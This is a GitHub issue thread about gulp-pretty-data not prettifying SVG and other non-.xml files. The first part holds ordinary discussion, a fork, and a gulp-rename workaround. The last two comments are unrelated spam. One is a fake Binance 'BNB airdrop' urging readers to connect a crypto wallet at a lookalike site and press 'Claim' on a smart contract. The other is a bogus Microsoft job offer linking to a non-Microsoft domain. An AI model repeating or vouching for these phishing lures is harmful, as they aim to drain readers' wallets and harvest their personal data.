### ISSUE TITLE
Not having any effect on XML

### ISSUE THREAD

**Issue by DavidOliver** [neilcarpenter/gulp-pretty-data#1]
Hi there,

I've tried to use this both as part of my `svgstore` task and a separate task but it doesn't seem to put elements on new lines or have any effect.

```
var dirs = require('../dirs');

var gulp = require('gulp');
var svgStore = require('gulp-svgstore');
var svgMin = require('gulp-svgmin');
var prettyData = require('gulp-pretty-data');

gulp.task('svg-store', function () {
    return gulp.src(dirs.src.graphics+'*.svg')
        .pipe(svgMin([{
            removeDoctype: true
        }]))
        .pipe(svgStore({
            fileName: 'svg-store.svg',
            prefix: 'icon-'
        }))
        .pipe(prettyData({ type: 'prettify' }))
        .pipe(gulp.dest(dirs.dest.images+'interface/'))
})

gulp.task('prettify-svg', function() {
    return gulp.src(dirs.dest.images+'interface/svg-store.svg')
        .pipe(prettyData({ type: 'prettify' }))
        .pipe(gulp.dest(dirs.dest.images+'interface/'))
})
```

**Comment by lunelson** [comment]
I've just made a PR to fix this. It's because it was silently skipping files that did not have an XML extension. If the PR doesn't get picked up you can use my fork and branch:

https://github.com/lunelson/gulp-pretty-data/tree/allow-svg

**Comment by DavidOliver** [comment]
@lunelson, many thanks!

**Comment by lunelson** [comment]
@DavidOliver sure thing. I've merged that change to the `master` branch of my fork now too; it's nice to have as part of my SVG optimization / icon-spriting

**Comment by binaryjam** [comment]
I have a similar problem, in that my xml is a .spdata suffix, so would be good if I could just tell the function what style to prettify

**Comment by lunelson** [comment]
@binaryjam yes it would have been better to not be based on file extensions; or be somehow overridable. I might have to change this in my fork and release it as a separate package at some point

**Comment by binaryjam** [comment]
thanks for considering it, i solved my problem using gulp-rename, nice
thing about streams nothing is to disk so it was super fast.  Be honest, If
it was my project I wouldnt bother considering how easy the rename hack is.

**Comment by lunelson** [comment]
@binaryjam ah good thought, I wouldn't have thought of hacking it that way. That actually would have worked as a solution to the original problem in this thread too. Did you have to use rename twice, in order to flip back to the original name?

**Comment by binaryjam** [comment]
I have, Im new to this, so I wasn't sure how the gulp.dest function works fully yet.

```
gulp.task('prettify3', ['packagecsproj'], function () {
    return gulp.src("./SandBoxSharePointFramework/SandBoxSharePointFramework.csproj")
        .pipe(rename("SandBoxSharePointFramework.csproj.xml"))
        .pipe(prettyData({
            type: 'prettify'
        }))
        .pipe(rename("SandBoxSharePointFramework.csproj"))
        .pipe(gulp.dest("./SandBoxSharePointFramework/", {
            "overwrite": true
        }));
});
```

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @HongW2019, @Beep3r, @A91y, @mehtamohit1812, @changthatsmynem, @MU94W, @hadysalama

**Comment by DavideStagni** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
w3st3ry, @klingtnet, @akoumjian, @Weilet, @rv-drassakhatsky, @albertoleal, @pradeepmathesh, @johngunerli, @mralexho, @adamransome, @adokarasev, @alexzeitgeist, @DalavanCloud, @onoma2, @AniPython, @justinpecott, @hemlockII, @ibrahimoa, @zombig, @buhe
